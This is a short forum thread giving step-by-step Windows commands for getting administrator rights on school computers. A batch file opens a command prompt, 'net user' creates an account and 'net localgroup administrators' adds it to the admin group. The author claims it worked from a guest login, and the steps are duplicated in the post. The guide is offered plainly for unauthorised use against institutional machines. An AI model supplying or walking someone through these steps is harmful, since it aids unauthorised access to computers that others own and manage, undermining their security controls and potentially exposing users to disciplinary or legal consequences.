How to be an admin on school computers
2 posters
Page 1 of 1
 How to be an admin on school computers
How to be an admin on school computers
1. Open notepad and type in command.com and then save the file as .bat
2. Open the file and command prompt should open.
3. In command prompt type in net user username/ADD i.e. net user D.K./ADD
4. Type net localgroup and find out the name of the local group they belong to admin. In most case it´s administrators.
5. Now type net localgroup administrators D.K. /ADD This will make D.K. an admin.
6. Log off and log in with your new username.
7. If you want to delete the username that you created type in net user username /DELETE
2. Open the file and command prompt should open.
3. In command prompt type in net user username/ADD i.e. net user D.K./ADD
4. Type net localgroup and find out the name of the local group they belong to admin. In most case it´s administrators.
5. Now type net localgroup administrators D.K. /ADD This will make D.K. an admin.
6. Log off and log in with your new username.
7. If you want to delete the username that you created type in net user username /DELETE

D.K.- Know-It-All
- Number of posts : 153
Registered : 2009-06-03
 Re: How to be an admin on school computers
Re: How to be an admin on school computers
Interesting, has this been tested on school computers?

Sam- Computer Savy
- Number of posts : 144
Registered : 2008-12-11
 Re: How to be an admin on school computers
Re: How to be an admin on school computers
Im not sure if this works at Trinity but Ive tried this on my computer when I was logged in as a guest and it worked fine.

D.K.- Know-It-All
- Number of posts : 153
Registered : 2009-06-03
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum